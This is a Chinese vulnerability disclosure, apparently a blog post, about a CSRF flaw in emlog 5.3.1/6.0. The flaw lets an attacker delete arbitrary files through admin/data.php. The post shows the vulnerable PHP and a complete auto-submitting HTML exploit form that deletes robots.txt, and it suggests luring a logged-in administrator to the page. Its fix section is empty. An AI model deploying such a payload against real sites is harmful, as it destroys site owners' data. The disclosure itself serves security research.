Emlog新版一处csrf导致的任意文件删除(可删除全站)

听说emlog更新到6.0了,下载了一份最新的代码,发现原来的bug还是没有修复。可能是官方没有在意,所以这里简单叙述一下危害。

出现的地方

admin/data.php139行

if ($action == 'dell_all_bak') {
    if (!isset($_POST['bak'])) {
        emDirect('./data.php?error_a=1');
    } else{
        foreach ($_POST['bak'] as $val) {
            unlink($val);
        }
        emDirect('./data.php?active_del=1');
    }}

可以看到后台是没有验证的,如果管理员访问到了精心构造的界面,则可以删除任意文件,这里代码使用数组循环的,所以管理员如果访问到了页面很可能会删除网站所有。

利用方式

以我本地搭建的网站emlog6.demo为例,构造如下exp:

<html>
  <head>
    
  </head>
  <body>
      <form action="http://emlog6.demo/admin/data.php?action=dell_all_bak" method="POST" id="transfer">
        <input type="hidden" name="bak[0]" value="../robots.txt" />
            <button>aa</button>
      </form>
<script type="text/javascript">
var f = document.getElementById("transfer");
f.submit();
</script>
  </body>
</html>

这里只删除robots.txt。然后将这个上传到任意网址,诱导管理员访问(管理员访问时需要确认已经登陆过后台) 这是访问之前:

访问之后看到robots.txt已经被删除了

影响范围

只测试过emlog 5.3.1和6.0 都中招

修复

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏编程

Go语言·不常用的Go命令详解

作者:孙飞撩技术 链接:http://www.jianshu.com/p/46c268e7a149 來源:简书 共3329字,阅读需8分钟 迁移自CSDN: $...

2515
来自专栏蓝天

Shell关于Wget命令的使用技巧

wget 是一个命令行的下载工具。对于我们这些 Linux 用户来说,几乎每天都在使用它。下面为大家介绍几个有用的 wget 小技巧,可以让你更加高效而灵活的使...

762
来自专栏云计算教程系列

如何在CentOS 7上安装和配置scponly

scponly是匿名FTP的安全替代品。它使管理员能够设置具有受限远程文件访问权限且无法访问交互式shell的安全用户帐户。

1410
来自专栏后端云

挂载云硬盘

已有云主机id 27b31829-326f-4029-a537-bb327303a32c

3646
来自专栏JarvanMo的IT专栏

Linux下Node.js的安装与配置

最近在学习Node.js,本人喜欢在linux下开发.一般来说安装Node.js有几下种方式:

1982
来自专栏州的先生

Python爬虫实战入门二:从一个简单的HTTP请求开始

1242
来自专栏黄日成的专栏

大话 Select、Poll、Epoll

提到select、poll、epoll相信大家都耳熟能详了,三个都是IO多路复用的机制,可以监视多个描述符的读/写等事件。

14.7K18
来自专栏

使用redis构建可靠分布式锁

关于分布式锁的概念,具体实现方式,直接参阅下面两个帖子,这里就不多介绍了。 分布式锁的多种实现方式 分布式锁总结 对于分布式锁的几种实现方式的优劣,这里再列举下...

2847
来自专栏FreeBuf

OFFICE OLE2LINK(CVE-2017-0199)漏洞利用详解

漏洞概述 FireEye最近公布了一个OFFICE 0day,在无需用户交互的情况下,打开word文档就可以通过hta脚本执行任意代码。经过研究发现,此漏洞的...

2409
来自专栏吴柯的运维笔记

Nginx服务器常见问题如何优化?

Nginx常见问题处理 -要求- 对Nginx服务器进行适当优化,以提升服务器的处理性能: 1.不显示Nginx软件版本号 2.如果客户端访问服务器提示“T...

3786

扫码关注云+社区

领取腾讯云代金券